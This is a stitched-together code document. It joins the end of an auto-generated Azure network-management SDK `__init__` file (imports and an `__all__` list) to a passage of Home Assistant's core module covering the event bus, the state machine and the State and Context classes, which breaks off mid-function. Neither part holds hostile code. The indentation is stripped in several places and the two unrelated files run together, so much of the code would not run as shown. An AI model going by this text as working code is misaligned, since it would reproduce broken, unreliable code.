from ._ip_groups_operations import IpGroupsOperations
from ._load_balancers_operations import LoadBalancersOperations
from ._load_balancer_backend_address_pools_operations import LoadBalancerBackendAddressPoolsOperations
from ._load_balancer_frontend_ip_configurations_operations import LoadBalancerFrontendIPConfigurationsOperations
from ._inbound_nat_rules_operations import InboundNatRulesOperations
from ._load_balancer_load_balancing_rules_operations import LoadBalancerLoadBalancingRulesOperations
from ._load_balancer_outbound_rules_operations import LoadBalancerOutboundRulesOperations
from ._load_balancer_network_interfaces_operations import LoadBalancerNetworkInterfacesOperations
from ._load_balancer_probes_operations import LoadBalancerProbesOperations
from ._nat_gateways_operations import NatGatewaysOperations
from ._network_interfaces_operations import NetworkInterfacesOperations
from ._network_interface_ip_configurations_operations import NetworkInterfaceIPConfigurationsOperations
from ._network_interface_load_balancers_operations import NetworkInterfaceLoadBalancersOperations
from ._network_interface_tap_configurations_operations import NetworkInterfaceTapConfigurationsOperations
from ._network_profiles_operations import NetworkProfilesOperations
from ._network_security_groups_operations import NetworkSecurityGroupsOperations
from ._security_rules_operations import SecurityRulesOperations
from ._default_security_rules_operations import DefaultSecurityRulesOperations
from ._network_virtual_appliances_operations import NetworkVirtualAppliancesOperations
from ._virtual_appliance_sites_operations import VirtualApplianceSitesOperations
from ._virtual_appliance_skus_operations import VirtualApplianceSkusOperations
from ._inbound_security_rule_operations import InboundSecurityRuleOperations
from ._network_watchers_operations import NetworkWatchersOperations
from ._packet_captures_operations import PacketCapturesOperations
from ._connection_monitors_operations import ConnectionMonitorsOperations
from ._flow_logs_operations import FlowLogsOperations
from ._operations import Operations
from ._private_endpoints_operations import PrivateEndpointsOperations
from ._available_private_endpoint_types_operations import AvailablePrivateEndpointTypesOperations
from ._private_dns_zone_groups_operations import PrivateDnsZoneGroupsOperations
from ._private_link_services_operations import PrivateLinkServicesOperations
from ._public_ip_addresses_operations import PublicIPAddressesOperations
from ._public_ip_prefixes_operations import PublicIPPrefixesOperations
from ._route_filters_operations import RouteFiltersOperations
from ._route_filter_rules_operations import RouteFilterRulesOperations
from ._route_tables_operations import RouteTablesOperations
from ._routes_operations import RoutesOperations
from ._security_partner_providers_operations import SecurityPartnerProvidersOperations
from ._bgp_service_communities_operations import BgpServiceCommunitiesOperations
from ._service_endpoint_policies_operations import ServiceEndpointPoliciesOperations
from ._service_endpoint_policy_definitions_operations import ServiceEndpointPolicyDefinitionsOperations
from ._service_tags_operations import ServiceTagsOperations
from ._usages_operations import UsagesOperations
from ._virtual_networks_operations import VirtualNetworksOperations
from ._subnets_operations import SubnetsOperations
from ._resource_navigation_links_operations import ResourceNavigationLinksOperations
from ._service_association_links_operations import ServiceAssociationLinksOperations
from ._virtual_network_peerings_operations import VirtualNetworkPeeringsOperations
from ._virtual_network_gateways_operations import VirtualNetworkGatewaysOperations
from ._virtual_network_gateway_connections_operations import VirtualNetworkGatewayConnectionsOperations
from ._local_network_gateways_operations import LocalNetworkGatewaysOperations
from ._virtual_network_taps_operations import VirtualNetworkTapsOperations
from ._virtual_routers_operations import VirtualRoutersOperations
from ._virtual_router_peerings_operations import VirtualRouterPeeringsOperations
from ._virtual_wans_operations import VirtualWansOperations
from ._vpn_sites_operations import VpnSitesOperations
from ._vpn_site_links_operations import VpnSiteLinksOperations
from ._vpn_sites_configuration_operations import VpnSitesConfigurationOperations
from ._vpn_server_configurations_operations import VpnServerConfigurationsOperations
from ._virtual_hubs_operations import VirtualHubsOperations
from ._hub_virtual_network_connections_operations import HubVirtualNetworkConnectionsOperations
from ._vpn_gateways_operations import VpnGatewaysOperations
from ._vpn_connections_operations import VpnConnectionsOperations
from ._vpn_site_link_connections_operations import VpnSiteLinkConnectionsOperations
from ._vpn_link_connections_operations import VpnLinkConnectionsOperations
from ._nat_rules_operations import NatRulesOperations
from ._p2_svpn_gateways_operations import P2SVpnGatewaysOperations
from ._vpn_server_configurations_associated_with_virtual_wan_operations import VpnServerConfigurationsAssociatedWithVirtualWanOperations
from ._virtual_hub_route_table_v2_s_operations import VirtualHubRouteTableV2SOperations
from ._express_route_gateways_operations import ExpressRouteGatewaysOperations
from ._express_route_connections_operations import ExpressRouteConnectionsOperations
from ._virtual_hub_bgp_connection_operations import VirtualHubBgpConnectionOperations
from ._virtual_hub_bgp_connections_operations import VirtualHubBgpConnectionsOperations
from ._virtual_hub_ip_configuration_operations import VirtualHubIpConfigurationOperations
from ._hub_route_tables_operations import HubRouteTablesOperations
from ._web_application_firewall_policies_operations import WebApplicationFirewallPoliciesOperations
# Public API of this generated operations package; mirrors the imports above.
__all__ = [
    'ApplicationGatewaysOperations',
    'ApplicationGatewayPrivateLinkResourcesOperations',
    'ApplicationGatewayPrivateEndpointConnectionsOperations',
    'ApplicationSecurityGroupsOperations',
    'AvailableDelegationsOperations',
    'AvailableResourceGroupDelegationsOperations',
    'AvailableServiceAliasesOperations',
    'AzureFirewallsOperations',
    'AzureFirewallFqdnTagsOperations',
    'WebCategoriesOperations',
    'BastionHostsOperations',
    'NetworkManagementClientOperationsMixin',
    'CustomIPPrefixesOperations',
    'DdosCustomPoliciesOperations',
    'DdosProtectionPlansOperations',
    'DscpConfigurationOperations',
    'AvailableEndpointServicesOperations',
    'ExpressRouteCircuitAuthorizationsOperations',
    'ExpressRouteCircuitPeeringsOperations',
    'ExpressRouteCircuitConnectionsOperations',
    'PeerExpressRouteCircuitConnectionsOperations',
    'ExpressRouteCircuitsOperations',
    'ExpressRouteServiceProvidersOperations',
    'ExpressRouteCrossConnectionsOperations',
    'ExpressRouteCrossConnectionPeeringsOperations',
    'ExpressRoutePortsLocationsOperations',
    'ExpressRoutePortsOperations',
    'ExpressRouteLinksOperations',
    'FirewallPoliciesOperations',
    'FirewallPolicyRuleCollectionGroupsOperations',
    'IpAllocationsOperations',
    'IpGroupsOperations',
    'LoadBalancersOperations',
    'LoadBalancerBackendAddressPoolsOperations',
    'LoadBalancerFrontendIPConfigurationsOperations',
    'InboundNatRulesOperations',
    'LoadBalancerLoadBalancingRulesOperations',
    'LoadBalancerOutboundRulesOperations',
    'LoadBalancerNetworkInterfacesOperations',
    'LoadBalancerProbesOperations',
    'NatGatewaysOperations',
    'NetworkInterfacesOperations',
    'NetworkInterfaceIPConfigurationsOperations',
    'NetworkInterfaceLoadBalancersOperations',
    'NetworkInterfaceTapConfigurationsOperations',
    'NetworkProfilesOperations',
    'NetworkSecurityGroupsOperations',
    'SecurityRulesOperations',
    'DefaultSecurityRulesOperations',
    'NetworkVirtualAppliancesOperations',
    'VirtualApplianceSitesOperations',
    'VirtualApplianceSkusOperations',
    'InboundSecurityRuleOperations',
    'NetworkWatchersOperations',
    'PacketCapturesOperations',
    'ConnectionMonitorsOperations',
    'FlowLogsOperations',
    'Operations',
    'PrivateEndpointsOperations',
    'AvailablePrivateEndpointTypesOperations',
    'PrivateDnsZoneGroupsOperations',
    'PrivateLinkServicesOperations',
    'PublicIPAddressesOperations',
    'PublicIPPrefixesOperations',
    'RouteFiltersOperations',
    'RouteFilterRulesOperations',
    'RouteTablesOperations',
    'RoutesOperations',
    'SecurityPartnerProvidersOperations',
    'BgpServiceCommunitiesOperations',
    'ServiceEndpointPoliciesOperations',
    'ServiceEndpointPolicyDefinitionsOperations',
    'ServiceTagsOperations',
    'UsagesOperations',
    'VirtualNetworksOperations',
    'SubnetsOperations',
    'ResourceNavigationLinksOperations',
    'ServiceAssociationLinksOperations',
    'VirtualNetworkPeeringsOperations',
    'VirtualNetworkGatewaysOperations',
    'VirtualNetworkGatewayConnectionsOperations',
    'LocalNetworkGatewaysOperations',
    'VirtualNetworkTapsOperations',
    'VirtualRoutersOperations',
    'VirtualRouterPeeringsOperations',
    'VirtualWansOperations',
    'VpnSitesOperations',
    'VpnSiteLinksOperations',
    'VpnSitesConfigurationOperations',
    'VpnServerConfigurationsOperations',
    'VirtualHubsOperations',
    'HubVirtualNetworkConnectionsOperations',
    'VpnGatewaysOperations',
    'VpnConnectionsOperations',
    'VpnSiteLinkConnectionsOperations',
    'VpnLinkConnectionsOperations',
    'NatRulesOperations',
    'P2SVpnGatewaysOperations',
    'VpnServerConfigurationsAssociatedWithVirtualWanOperations',
    'VirtualHubRouteTableV2SOperations',
    'ExpressRouteGatewaysOperations',
    'ExpressRouteConnectionsOperations',
    'VirtualHubBgpConnectionOperations',
    'VirtualHubBgpConnectionsOperations',
    'VirtualHubIpConfigurationOperations',
    'HubRouteTablesOperations',
    'WebApplicationFirewallPoliciesOperations',
]
| |
"""
Core components of Home Assistant.
Home Assistant is a Home Automation framework for observing the state
of entities and reacting to changes.
"""
import asyncio
from concurrent.futures import ThreadPoolExecutor
import datetime
import enum
import functools
import logging
import os
import pathlib
import threading
from time import monotonic
from types import MappingProxyType
from typing import (
TYPE_CHECKING,
Any,
Awaitable,
Callable,
Coroutine,
Dict,
List,
Mapping,
Optional,
Set,
TypeVar,
)
import uuid
from async_timeout import timeout
import attr
import voluptuous as vol
from homeassistant import loader, util
from homeassistant.const import (
ATTR_DOMAIN,
ATTR_FRIENDLY_NAME,
ATTR_NOW,
ATTR_SECONDS,
ATTR_SERVICE,
ATTR_SERVICE_DATA,
CONF_UNIT_SYSTEM_IMPERIAL,
EVENT_CALL_SERVICE,
EVENT_CORE_CONFIG_UPDATE,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
EVENT_SERVICE_REGISTERED,
EVENT_SERVICE_REMOVED,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
EVENT_TIMER_OUT_OF_SYNC,
MATCH_ALL,
__version__,
)
from homeassistant.exceptions import (
HomeAssistantError,
InvalidEntityFormatError,
InvalidStateError,
ServiceNotFound,
Unauthorized,
)
from homeassistant.util import location, slugify
from homeassistant.util.async_ import fire_coroutine_threadsafe, run_callback_threadsafe
import homeassistant.util.dt as dt_util
from homeassistant.util.unit_system import IMPERIAL_SYSTEM, METRIC_SYSTEM, UnitSystem
# Typing imports that create a circular dependency
if TYPE_CHECKING:
from homeassistant.config_entries import ConfigEntries
from homeassistant.components.http import HomeAssistantHTTP
# pylint: disable=invalid-name
T = TypeVar("T")
CALLABLE_T = TypeVar("CALLABLE_T", bound=Callable)
CALLBACK_TYPE = Callable[[], None]
# pylint: enable=invalid-name
CORE_STORAGE_KEY = "core.config"
CORE_STORAGE_VERSION = 1
DOMAIN = "homeassistant"
# How long we wait for the result of a service call
SERVICE_CALL_LIMIT = 10 # seconds
# Source of core configuration
SOURCE_DISCOVERED = "discovered"
SOURCE_STORAGE = "storage"
SOURCE_YAML = "yaml"
# How long to wait till things that run on startup have to finish.
TIMEOUT_EVENT_START = 15
_LOGGER = logging.getLogger(__name__)
def split_entity_id(entity_id: str) -> List[str]:
    """Split a state entity_id into domain, object_id."""
    # Split only on the first dot: the object_id portion may contain dots.
    parts = entity_id.split(".", 1)
    return parts
def valid_entity_id(entity_id: str) -> bool:
    """Test if an entity ID is a valid format.

    Format: <domain>.<entity> where both are slugs.
    """
    if "." not in entity_id:
        return False
    # Slugifying must only change the separating dot (into an underscore);
    # anything else means the ID contained non-slug characters.
    return slugify(entity_id) == entity_id.replace(".", "_", 1)
def valid_state(state: str) -> bool:
    """Test if a state is valid."""
    # State values may be at most 255 characters long.
    return len(state) <= 255
def callback(func: CALLABLE_T) -> CALLABLE_T:
    """Annotation to mark method as safe to call from within the event loop."""
    # Tag the callable so is_callback() recognises it; return it unchanged
    # so the function works as a decorator.
    setattr(func, "_hass_callback", True)
    return func
def is_callback(func: Callable[..., Any]) -> bool:
    """Check if function is safe to be called in the event loop."""
    # Only the exact marker set by @callback counts; any other truthy
    # attribute value is ignored.
    marker = getattr(func, "_hass_callback", False)
    return marker is True
@callback
def async_loop_exception_handler(_: Any, context: Dict) -> None:
    """Handle all exception inside the core loop."""
    exc = context.get("exception")
    kwargs: Dict[str, Any] = {}
    if exc:
        # Forward full traceback information to the logger when available.
        kwargs["exc_info"] = (type(exc), exc, exc.__traceback__)
    _LOGGER.error(
        "Error doing job: %s", context["message"], **kwargs  # type: ignore
    )
class CoreState(enum.Enum):
    """Represent the current state of Home Assistant."""

    not_running = "NOT_RUNNING"
    starting = "STARTING"
    running = "RUNNING"
    stopping = "STOPPING"

    def __str__(self) -> str:
        """Return the underlying state name (the enum's string value)."""
        return str(self.value)
class HomeAssistant:
    """Root object of the Home Assistant home automation."""

    # Injected later by the http / config_entries setup code, not in __init__.
    http: "HomeAssistantHTTP" = None  # type: ignore
    config_entries: "ConfigEntries" = None  # type: ignore

    def __init__(self, loop: Optional[asyncio.events.AbstractEventLoop] = None) -> None:
        """Initialize new Home Assistant object."""
        self.loop: asyncio.events.AbstractEventLoop = (loop or asyncio.get_event_loop())
        executor_opts: Dict[str, Any] = {
            "max_workers": None,
            "thread_name_prefix": "SyncWorker",
        }
        self.executor = ThreadPoolExecutor(**executor_opts)
        self.loop.set_default_executor(self.executor)
        self.loop.set_exception_handler(async_loop_exception_handler)
        # Tasks scheduled while tracking is enabled; drained by
        # async_block_till_done().
        self._pending_tasks: list = []
        self._track_task = True
        self.bus = EventBus(self)
        self.services = ServiceRegistry(self)
        self.states = StateMachine(self.bus, self.loop)
        self.config = Config(self)
        self.components = loader.Components(self)
        self.helpers = loader.Helpers(self)
        # This is a dictionary that any component can store any data on.
        self.data: dict = {}
        self.state = CoreState.not_running
        self.exit_code = 0
        # If not None, use to signal end-of-loop
        self._stopped: Optional[asyncio.Event] = None

    @property
    def is_running(self) -> bool:
        """Return if Home Assistant is running (starting counts as running)."""
        return self.state in (CoreState.starting, CoreState.running)

    def start(self) -> int:
        """Start Home Assistant.

        Note: This function is only used for testing.
        For regular use, use "await hass.run()".
        """
        # Register the async start
        fire_coroutine_threadsafe(self.async_start(), self.loop)

        # Run forever
        try:
            # Block until stopped
            _LOGGER.info("Starting Home Assistant core loop")
            self.loop.run_forever()
        finally:
            self.loop.close()
        return self.exit_code

    async def async_run(self, *, attach_signals: bool = True) -> int:
        """Home Assistant main entry point.

        Start Home Assistant and block until stopped.

        This method is a coroutine.
        """
        if self.state != CoreState.not_running:
            raise RuntimeError("Home Assistant is already running")

        # _async_stop will set this instead of stopping the loop
        self._stopped = asyncio.Event()

        await self.async_start()
        if attach_signals:
            # Imported here to avoid a circular import at module load time.
            from homeassistant.helpers.signal import async_register_signal_handling

            async_register_signal_handling(self)

        await self._stopped.wait()
        return self.exit_code

    async def async_start(self) -> None:
        """Finalize startup from inside the event loop.

        This method is a coroutine.
        """
        _LOGGER.info("Starting Home Assistant")
        self.state = CoreState.starting

        setattr(self.loop, "_thread_ident", threading.get_ident())
        self.bus.async_fire(EVENT_HOMEASSISTANT_START)
        try:
            # Only block for EVENT_HOMEASSISTANT_START listener
            self.async_stop_track_tasks()
            with timeout(TIMEOUT_EVENT_START):
                await self.async_block_till_done()
        except asyncio.TimeoutError:
            _LOGGER.warning(
                "Something is blocking Home Assistant from wrapping up the "
                "start up phase. We're going to continue anyway. Please "
                "report the following info at http://bit.ly/2ogP58T : %s",
                ", ".join(self.config.components),
            )

        # Allow automations to set up the start triggers before changing state
        await asyncio.sleep(0)

        if self.state != CoreState.starting:
            # async_stop() ran while we were waiting above.
            _LOGGER.warning(
                "Home Assistant startup has been interrupted. "
                "Its state may be inconsistent."
            )
            return

        self.state = CoreState.running
        _async_create_timer(self)

    def add_job(self, target: Callable[..., Any], *args: Any) -> None:
        """Add job to the executor pool. Safe to call from any thread.

        target: target to call.
        args: parameters for method to call.
        """
        if target is None:
            raise ValueError("Don't call add_job with None")
        self.loop.call_soon_threadsafe(self.async_add_job, target, *args)

    @callback
    def async_add_job(
        self, target: Callable[..., Any], *args: Any
    ) -> Optional[asyncio.Future]:
        """Add a job from within the event loop.

        This method must be run in the event loop.

        target: target to call.
        args: parameters for method to call.

        Returns the scheduled task/future, or None when the target was a
        plain callback executed via call_soon.
        """
        task = None

        # Check for partials to properly determine if coroutine function
        check_target = target
        while isinstance(check_target, functools.partial):
            check_target = check_target.func

        if asyncio.iscoroutine(check_target):
            task = self.loop.create_task(target)  # type: ignore
        elif is_callback(check_target):
            # Marked @callback: safe to run directly in the loop, no task.
            self.loop.call_soon(target, *args)
        elif asyncio.iscoroutinefunction(check_target):
            task = self.loop.create_task(target(*args))
        else:
            # Plain sync callable: off-load to the executor pool.
            task = self.loop.run_in_executor(  # type: ignore
                None, target, *args
            )

        # If a task is scheduled
        if self._track_task and task is not None:
            self._pending_tasks.append(task)

        return task

    @callback
    def async_create_task(self, target: Coroutine) -> asyncio.tasks.Task:
        """Create a task from within the eventloop.

        This method must be run in the event loop.

        target: target to call.
        """
        task: asyncio.tasks.Task = self.loop.create_task(target)

        if self._track_task:
            self._pending_tasks.append(task)

        return task

    @callback
    def async_add_executor_job(
        self, target: Callable[..., T], *args: Any
    ) -> Awaitable[T]:
        """Add an executor job from within the event loop."""
        task = self.loop.run_in_executor(None, target, *args)

        # If a task is scheduled
        if self._track_task:
            self._pending_tasks.append(task)

        return task

    @callback
    def async_track_tasks(self) -> None:
        """Track tasks so you can wait for all tasks to be done."""
        self._track_task = True

    @callback
    def async_stop_track_tasks(self) -> None:
        """Stop track tasks so you can't wait for all tasks to be done."""
        self._track_task = False

    @callback
    def async_run_job(self, target: Callable[..., None], *args: Any) -> None:
        """Run a job from within the event loop.

        Callbacks are invoked synchronously; everything else is scheduled
        via async_add_job.

        This method must be run in the event loop.

        target: target to call.
        args: parameters for method to call.
        """
        if not asyncio.iscoroutine(target) and is_callback(target):
            target(*args)
        else:
            self.async_add_job(target, *args)

    def block_till_done(self) -> None:
        """Block till all pending work is done. Safe to call from any thread."""
        asyncio.run_coroutine_threadsafe(
            self.async_block_till_done(), self.loop
        ).result()

    async def async_block_till_done(self) -> None:
        """Block till all pending work is done."""
        # To flush out any call_soon_threadsafe
        await asyncio.sleep(0)

        # Awaiting tasks may schedule new tasks, so loop until the pending
        # list stays empty.
        while self._pending_tasks:
            pending = [task for task in self._pending_tasks if not task.done()]
            self._pending_tasks.clear()
            if pending:
                await asyncio.wait(pending)
            else:
                await asyncio.sleep(0)

    def stop(self) -> None:
        """Stop Home Assistant and shuts down all threads."""
        if self.state == CoreState.not_running:  # just ignore
            return
        fire_coroutine_threadsafe(self.async_stop(), self.loop)

    async def async_stop(self, exit_code: int = 0, *, force: bool = False) -> None:
        """Stop Home Assistant and shuts down all threads.

        The "force" flag commands async_stop to proceed regardless of
        Home Assistant's current state. You should not set this flag
        unless you're testing.

        This method is a coroutine.
        """
        if not force:
            # Some tests require async_stop to run,
            # regardless of the state of the loop.
            if self.state == CoreState.not_running:  # just ignore
                return
            if self.state == CoreState.stopping:
                _LOGGER.info("async_stop called twice: ignored")
                return
            if self.state == CoreState.starting:
                # This may not work
                _LOGGER.warning("async_stop called before startup is complete")

        # stage 1: notify and drain outstanding work
        self.state = CoreState.stopping
        self.async_track_tasks()
        self.bus.async_fire(EVENT_HOMEASSISTANT_STOP)
        await self.async_block_till_done()

        # stage 2: close resources and shut down the executor
        self.state = CoreState.not_running
        self.bus.async_fire(EVENT_HOMEASSISTANT_CLOSE)
        await self.async_block_till_done()
        self.executor.shutdown()

        self.exit_code = exit_code

        if self._stopped is not None:
            # async_run() is waiting on this event; let it return.
            self._stopped.set()
        else:
            self.loop.stop()
@attr.s(slots=True, frozen=True)
class Context:
    """The context that triggered something."""

    # ID of the user that triggered the action, if any.
    user_id = attr.ib(type=str, default=None)
    # ID of the parent context when one action caused another.
    parent_id = attr.ib(type=Optional[str], default=None)
    # Unique identifier for this context; generated per instance.
    id = attr.ib(type=str, default=attr.Factory(lambda: uuid.uuid4().hex))

    def as_dict(self) -> dict:
        """Return a dictionary representation of the context."""
        return {"id": self.id, "parent_id": self.parent_id, "user_id": self.user_id}
class EventOrigin(enum.Enum):
    """Represent the origin of an event."""

    local = "LOCAL"
    remote = "REMOTE"

    def __str__(self) -> str:
        """Return the origin name (the enum's string value)."""
        return str(self.value)
class Event:
    """Representation of an event within the bus."""

    __slots__ = ["event_type", "data", "origin", "time_fired", "context"]

    def __init__(
        self,
        event_type: str,
        data: Optional[Dict] = None,
        origin: EventOrigin = EventOrigin.local,
        time_fired: Optional[int] = None,
        context: Optional[Context] = None,
    ) -> None:
        """Initialize a new event."""
        self.event_type = event_type
        # Falsy arguments (None or empty) fall back to fresh defaults.
        self.data = data if data else {}
        self.origin = origin
        self.time_fired = time_fired if time_fired else dt_util.utcnow()
        self.context: Context = context if context else Context()

    def as_dict(self) -> Dict:
        """Create a dict representation of this Event.

        Async friendly.
        """
        return {
            "event_type": self.event_type,
            "data": dict(self.data),
            "origin": str(self.origin),
            "time_fired": self.time_fired,
            "context": self.context.as_dict(),
        }

    def __repr__(self) -> str:
        """Return the representation."""
        # pylint: disable=maybe-no-member
        origin_char = str(self.origin)[0]
        if self.data:
            return "<Event {}[{}]: {}>".format(
                self.event_type, origin_char, util.repr_helper(self.data)
            )
        return "<Event {}[{}]>".format(self.event_type, origin_char)

    def __eq__(self, other: Any) -> bool:
        """Return the comparison."""
        if self.__class__ != other.__class__:
            return False
        return (  # type: ignore
            self.event_type,
            self.data,
            self.origin,
            self.time_fired,
            self.context,
        ) == (
            other.event_type,
            other.data,
            other.origin,
            other.time_fired,
            other.context,
        )
class EventBus:
"""Allow the firing of and listening for events."""
def __init__(self, hass: HomeAssistant) -> None:
    """Initialize a new event bus."""
    self._hass = hass
    # Maps event_type -> list of subscribed callables.
    self._listeners: Dict[str, List[Callable]] = {}
@callback
def async_listeners(self) -> Dict[str, int]:
    """Return dictionary with events and the number of listeners.

    This method must be run in the event loop.
    """
    return {event_type: len(subs) for event_type, subs in self._listeners.items()}
@property
def listeners(self) -> Dict[str, int]:
    """Return dictionary with events and the number of listeners.

    Thread-safe wrapper around async_listeners().
    """
    future = run_callback_threadsafe(self._hass.loop, self.async_listeners)
    return future.result()  # type: ignore
def fire(
    self,
    event_type: str,
    event_data: Optional[Dict] = None,
    origin: EventOrigin = EventOrigin.local,
    context: Optional[Context] = None,
) -> None:
    """Fire an event. Safe to call from any thread."""
    # Hand the actual dispatch off to the event loop thread.
    args = (self.async_fire, event_type, event_data, origin, context)
    self._hass.loop.call_soon_threadsafe(*args)
@callback
def async_fire(
    self,
    event_type: str,
    event_data: Optional[Dict] = None,
    origin: EventOrigin = EventOrigin.local,
    context: Optional[Context] = None,
) -> None:
    """Fire an event.

    This method must be run in the event loop.
    """
    targets = self._listeners.get(event_type, [])

    # EVENT_HOMEASSISTANT_CLOSE is delivered only to its own listeners,
    # never to MATCH_ALL subscribers.
    if event_type != EVENT_HOMEASSISTANT_CLOSE:
        wildcard = self._listeners.get(MATCH_ALL)
        if wildcard is not None:
            targets = wildcard + targets

    event = Event(event_type, event_data, origin, None, context)

    # Time-changed events fire every second; logging them would be noise.
    if event_type != EVENT_TIME_CHANGED:
        _LOGGER.debug("Bus:Handling %s", event)

    for func in targets:
        self._hass.async_add_job(func, event)
def listen(self, event_type: str, listener: Callable) -> CALLBACK_TYPE:
    """Listen for all events or events of a specific type.

    To listen to all events specify the constant ``MATCH_ALL``
    as event_type.

    Thread-safe wrapper around async_listen(); returns an unsubscribe
    function that is itself thread-safe.
    """
    async_remove = run_callback_threadsafe(
        self._hass.loop, self.async_listen, event_type, listener
    ).result()

    def remove_listener() -> None:
        """Remove the listener."""
        run_callback_threadsafe(self._hass.loop, async_remove).result()

    return remove_listener
@callback
def async_listen(self, event_type: str, listener: Callable) -> CALLBACK_TYPE:
    """Listen for all events or events of a specific type.

    To listen to all events specify the constant ``MATCH_ALL``
    as event_type.

    This method must be run in the event loop.
    """
    self._listeners.setdefault(event_type, []).append(listener)

    def remove_listener() -> None:
        """Remove the listener."""
        self._async_remove_listener(event_type, listener)

    return remove_listener
def listen_once(self, event_type: str, listener: Callable) -> CALLBACK_TYPE:
"""Listen once for event of a specific type.
To listen to all events specify the constant ``MATCH_ALL``
as event_type.
Returns function to unsubscribe the listener.
"""
async_remove_listener = run_callback_threadsafe(
self._hass.loop, self.async_listen_once, event_type, listener
).result()
def remove_listener() -> None:
"""Remove the listener."""
run_callback_threadsafe(self._hass.loop, async_remove_listener).result()
return remove_listener
    @callback
    def async_listen_once(self, event_type: str, listener: Callable) -> CALLBACK_TYPE:
        """Listen once for event of a specific type.

        To listen to all events specify the constant ``MATCH_ALL``
        as event_type.

        Returns registered listener that can be used with remove_listener.

        This method must be run in the event loop.
        """

        @callback
        def onetime_listener(event: Event) -> None:
            """Remove listener from event bus and then fire listener."""
            # The "run" attribute on the function object itself is used as a
            # once-only sentinel; it does not exist until set below.
            if hasattr(onetime_listener, "run"):
                return
            # Set variable so that we will never run twice.
            # Because the event bus loop might have async_fire queued multiple
            # times, its possible this listener may already be lined up
            # multiple times as well.
            # This will make sure the second time it does nothing.
            setattr(onetime_listener, "run", True)
            self._async_remove_listener(event_type, onetime_listener)
            self._hass.async_run_job(listener, event)

        return self.async_listen(event_type, onetime_listener)
@callback
def _async_remove_listener(self, event_type: str, listener: Callable) -> None:
"""Remove a listener of a specific event_type.
This method must be run in the event loop.
"""
try:
self._listeners[event_type].remove(listener)
# delete event_type list if empty
if not self._listeners[event_type]:
self._listeners.pop(event_type)
except (KeyError, ValueError):
# KeyError is key event_type listener did not exist
# ValueError if listener did not exist within event_type
_LOGGER.warning("Unable to remove unknown listener %s", listener)
class State:
    """Object to represent a state within the state machine.

    entity_id: the entity that is represented.
    state: the state of the entity
    attributes: extra information on entity and state
    last_changed: last time the state was changed, not the attributes.
    last_updated: last time this object was updated.
    context: Context in which it was created
    """

    # __slots__ keeps per-instance memory low; a State is created for every
    # entity update.
    __slots__ = [
        "entity_id",
        "state",
        "attributes",
        "last_changed",
        "last_updated",
        "context",
    ]

    def __init__(
        self,
        entity_id: str,
        state: str,
        attributes: Optional[Mapping] = None,
        last_changed: Optional[datetime.datetime] = None,
        last_updated: Optional[datetime.datetime] = None,
        context: Optional[Context] = None,
        # Temp, because database can still store invalid entity IDs
        # Remove with 1.0 or in 2020.
        temp_invalid_id_bypass: Optional[bool] = False,
    ) -> None:
        """Initialize a new state.

        Raises InvalidEntityFormatError for a malformed entity_id (unless
        temp_invalid_id_bypass is set) and InvalidStateError when the state
        string fails validation (max length 255).
        """
        state = str(state)

        if not valid_entity_id(entity_id) and not temp_invalid_id_bypass:
            raise InvalidEntityFormatError(
                f"Invalid entity id encountered: {entity_id}. "
                "Format should be <domain>.<object_id>"
            )

        if not valid_state(state):
            raise InvalidStateError(
                f"Invalid state encountered for entity id: {entity_id}. "
                "State max length is 255 characters."
            )

        self.entity_id = entity_id.lower()
        self.state = state
        # MappingProxyType exposes the attributes as a read-only view.
        self.attributes = MappingProxyType(attributes or {})
        self.last_updated = last_updated or dt_util.utcnow()
        # New states default last_changed to last_updated.
        self.last_changed = last_changed or self.last_updated
        self.context = context or Context()

    @property
    def domain(self) -> str:
        """Domain of this state."""
        return split_entity_id(self.entity_id)[0]

    @property
    def object_id(self) -> str:
        """Object id of this state."""
        return split_entity_id(self.entity_id)[1]

    @property
    def name(self) -> str:
        """Name of this state.

        Falls back to the object_id with underscores replaced by spaces when
        no friendly name attribute is set.
        """
        return self.attributes.get(ATTR_FRIENDLY_NAME) or self.object_id.replace(
            "_", " "
        )

    def as_dict(self) -> Dict:
        """Return a dict representation of the State.

        Async friendly.

        To be used for JSON serialization.
        Ensures: state == State.from_dict(state.as_dict())
        """
        return {
            "entity_id": self.entity_id,
            "state": self.state,
            "attributes": dict(self.attributes),
            "last_changed": self.last_changed,
            "last_updated": self.last_updated,
            "context": self.context.as_dict(),
        }

    @classmethod
    def from_dict(cls, json_dict: Dict) -> Any:
        """Initialize a state from a dict.

        Async friendly.

        Ensures: state == State.from_json_dict(state.to_json_dict())

        Returns None when the dict is missing the required
        entity_id/state keys.
        """
        if not (json_dict and "entity_id" in json_dict and "state" in json_dict):
            return None

        # Timestamps may arrive as ISO strings (e.g. from JSON); parse them.
        last_changed = json_dict.get("last_changed")
        if isinstance(last_changed, str):
            last_changed = dt_util.parse_datetime(last_changed)

        last_updated = json_dict.get("last_updated")
        if isinstance(last_updated, str):
            last_updated = dt_util.parse_datetime(last_updated)

        context = json_dict.get("context")
        if context:
            context = Context(id=context.get("id"), user_id=context.get("user_id"))

        return cls(
            json_dict["entity_id"],
            json_dict["state"],
            json_dict.get("attributes"),
            last_changed,
            last_updated,
            context,
        )

    def __eq__(self, other: Any) -> bool:
        """Return the comparison of the state.

        NOTE: last_changed and last_updated are not part of equality.
        """
        return (  # type: ignore
            self.__class__ == other.__class__
            and self.entity_id == other.entity_id
            and self.state == other.state
            and self.attributes == other.attributes
            and self.context == other.context
        )

    def __repr__(self) -> str:
        """Return the representation of the states."""
        attrs = (
            "; {}".format(util.repr_helper(self.attributes)) if self.attributes else ""
        )

        return "<state {}={}{} @ {}>".format(
            self.entity_id,
            self.state,
            attrs,
            dt_util.as_local(self.last_changed).isoformat(),
        )
class StateMachine:
    """Helper class that tracks the state of different entities."""

    def __init__(self, bus: EventBus, loop: asyncio.events.AbstractEventLoop) -> None:
        """Initialize state machine."""
        # Maps lower-cased entity_id -> State.
        self._states: Dict[str, State] = {}
        self._bus = bus
        self._loop = loop

    def entity_ids(self, domain_filter: Optional[str] = None) -> List[str]:
        """List of entity ids that are being tracked.

        Thread-safe wrapper around async_entity_ids.
        """
        future = run_callback_threadsafe(
            self._loop, self.async_entity_ids, domain_filter
        )
        return future.result()  # type: ignore

    @callback
    def async_entity_ids(self, domain_filter: Optional[str] = None) -> List[str]:
        """List of entity ids that are being tracked.

        This method must be run in the event loop.
        """
        if domain_filter is None:
            return list(self._states.keys())

        domain_filter = domain_filter.lower()

        return [
            state.entity_id
            for state in self._states.values()
